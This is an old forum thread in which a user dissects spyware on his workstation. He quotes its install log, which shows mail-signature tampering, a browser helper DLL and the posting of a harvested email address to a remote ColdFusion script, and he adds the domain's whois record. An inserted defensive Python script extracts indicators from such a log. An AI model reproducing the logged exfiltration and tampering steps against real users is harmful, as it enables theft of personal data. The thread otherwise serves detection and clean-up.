How can I track down this Forged Header Spammer.


Andonyx
3rd November 2003, 07:39 AM
I came to work today to find my computer unresponsive and sluggish, which is somewhat odd for a dual 2.4 Xeon workstation.

After digging through my processes I found something called estartlinkrotator.exe sucking up processing power and harddrive bandwidth.

A search revealed it in my startup menu, in my registry, win.ini..etc etc.

When I finally dug all of it out from safe mode, I went through its install log to find this:


Inside main install function
>>UpdateSignature
UpdateOutlookExpressSignature
the full path is Identities\{EC41636B-709A-4A23-9609-B501EC4E1A65}\Software\Microsoft\Outlook Express\
the key name is 5.0
>>ForceOESignature
<<ForceOESignature
Number of keys = 0
The file path is
C:\Documents and Settings\Administrator\Application Data\Microsoft\Signatures\*.txt
No signature files found
>> ForceOutlookSignature
b4 Setting sig for outlook2002
>>ChangeSignatureInFile
The file name is
C:\Documents and Settings\Administrator\Application Data\Microsoft\Signatures\sig1.txt
...

Inside BHO
The target path is
C:\WINDOWS\System32\BandObjs1,0,0,3.dll
The target path is
BandObjs1,0,0,3.dll
About to register the bandObjs.dll
<<InstallBHO
>>Install_UnInstall
Suucesflly added the UnInstall
In the function UpdateEmailInDB
the default email client is
"%programfiles%\outlook express\msimn.exe" /mailurl:%1
The default email client is Outlook Express
>>GetOEMail
Coudnt open the key for the identities
The path to the key is
Software\Microsoft\Internet Account Manager\Accounts\00000001
<< GetOEMail
The email id retrieved
<edited out>
The display name is
<Edited OUt>
After GetEmailDetails
The cust id is


Anyway, you get the idea....

But then it goes on to post the stolen information to a cold fusion script at the following address....


The url to be posted is
http://www.u-s-go.com/email2db.cfm?email=<edited out>.com&name=<edited out>&id=&program=Test
The customer id is


So going to the u-s-go.com website takes me to some wannabe host called Go Daddy....

And pulling up a whois yields this:


Registrant:
Go Webhosting
4501-14 Southern Hills Dr. #14
Sioux City, IA 51106-4735
US
530-688-9820
Domain Name: U-S-GO.COM
Administrative Contact:
Master, Host admin@u-s-go.com
4501-14 Southern Hills Dr. #14
Sioux City, IA 51106-4735
US
530-688-9820
Technical Contact:
Master, Host admin@u-s-go.com
4501-14 Southern Hills Dr. #14
Sioux City, IA 51106-4735
US
530-688-9820

Now what can I do with this information to legally complain or have this guy shut down or something.

Granted, although I cannot be 100% sure some idiot at my office didn't somehow install this stuff, I know it's not me... I'm supposed to be the only one who uses this computer, and since it's at work, it didn't come from surfing the seamy underbelly of the net.
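The install log quoted above is itself a useful triage artefact: it names every file the installer dropped, every registry key it touched and the URL it posts the harvested address to. As an added example (not part of the original post and not code from the program the poster found), the Python script below pulls those indicators out of a log in that format and notes what each one implies for clean-up and detection. The log text embedded in it is a constructed sample modelled on the quoted log, with the redacted e-mail address replaced by a placeholder; the triage rules are my own reading of the log, not anything the installer documents.

```python
"""Triage an installer log of the kind quoted in the thread: collect file,
registry and network indicators and say what each one means for clean-up."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample, modelled on the log quoted in the post. The e-mail
# address the real log contained is replaced by a placeholder.
SAMPLE_LOG = r"""
Inside main install function
>>UpdateSignature
UpdateOutlookExpressSignature
the full path is Identities\{EC41636B-709A-4A23-9609-B501EC4E1A65}\Software\Microsoft\Outlook Express\
the key name is 5.0
The file path is
C:\Documents and Settings\Administrator\Application Data\Microsoft\Signatures\*.txt
>>ChangeSignatureInFile
The file name is
C:\Documents and Settings\Administrator\Application Data\Microsoft\Signatures\sig1.txt
Inside BHO
The target path is
C:\WINDOWS\System32\BandObjs1,0,0,3.dll
About to register the bandObjs.dll
In the function UpdateEmailInDB
the default email client is
"%programfiles%\outlook express\msimn.exe" /mailurl:%1
>>GetOEMail
The path to the key is
Software\Microsoft\Internet Account Manager\Accounts\00000001
The url to be posted is
http://www.u-s-go.com/email2db.cfm?email=REDACTED%40example.com&name=REDACTED&id=&program=Test
"""

URL_RE = re.compile(r"https?://\S+")
# Absolute drive paths and %VAR%-relative paths (stop at a closing quote).
PATH_RE = re.compile(r'(?:[A-Za-z]:\\|%[A-Za-z]+%\\)[^\r\n"]+')
# Registry paths as the log prints them: optional OE identity prefix, then Software\...
REG_RE = re.compile(r"(?:Identities\\\{[0-9A-Fa-f-]+\}\\)?Software\\[^\r\n]+")
# Bare binary names mentioned without a directory (e.g. "register the bandObjs.dll").
BINARY_RE = re.compile(r"[\w,.\-]+\.(?:dll|exe)\b")

# What each indicator means for the defender, from the behaviour the log shows.
TRIAGE_RULES = (
    ("\\signatures\\", "mail signature tampering: outbound mail gets a spam footer"),
    ("bandobjs", "Browser Helper Object / band DLL: Internet Explorer persistence"),
    ("msimn.exe", "default mail client resolved from the registry: Outlook Express targeted"),
    ("internet account manager", "Outlook Express account key read: address harvested for exfiltration"),
    ("outlook express", "Outlook Express identity key: per-identity signature setting changed"),
)


def _dedupe(items):
    return list(dict.fromkeys(items))


def extract_indicators(log_text):
    """Return {'files': [...], 'registry': [...], 'urls': [...]} in log order."""
    files, registry, urls = [], [], []
    for raw in log_text.splitlines():
        line = raw.strip()
        m = URL_RE.search(line)
        if m:
            urls.append(m.group(0))
            continue
        m = PATH_RE.search(line)
        if m:
            files.append(m.group(0))
            continue
        m = REG_RE.search(line)
        if m:
            registry.append(m.group(0).rstrip("\\"))
            continue
        m = BINARY_RE.search(line)
        if m:
            files.append(m.group(0))
    return {"files": _dedupe(files), "registry": _dedupe(registry), "urls": _dedupe(urls)}


def describe_exfil(url):
    """Host to block or watch for, plus the field names being sent out."""
    parts = urlsplit(url)
    fields = parse_qs(parts.query, keep_blank_values=True)
    return {"host": parts.hostname, "path": parts.path, "fields": sorted(fields)}


def triage(indicators):
    """Pair each file/registry indicator with the first matching triage note."""
    notes = []
    for value in indicators["files"] + indicators["registry"]:
        for needle, meaning in TRIAGE_RULES:
            if needle in value.lower():
                notes.append((value, meaning))
                break
    return notes


if __name__ == "__main__":
    found = extract_indicators(SAMPLE_LOG)
    for value, meaning in triage(found):
        print(f"{value}\n    -> {meaning}")
    for url in found["urls"]:
        print(describe_exfil(url))
```

Running it on the sample prints the dropped DLL and tampered signature files with their meaning, and reports that the post to www.u-s-go.com carries the fields email, id, name and program; the host and path are what you would put on a proxy or DNS watch list, and the file and registry list is the clean-up checklist for the other machines on the same network.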

garys_2k
4th November 2003, 06:15 AM
Well, you got it somehow. Drive-by download, spam attachment, "helpful" coworker, infected document, infected network drive. I don't think Spybot or Adaware have got this in their sights yet, it looks like you may have been one of the lucky early infected.

As for legal action against the host site, I found this: http://www.infohq.com/Computer/Spam/complain-illegal-email-spam-hackers.htm

Best of luck!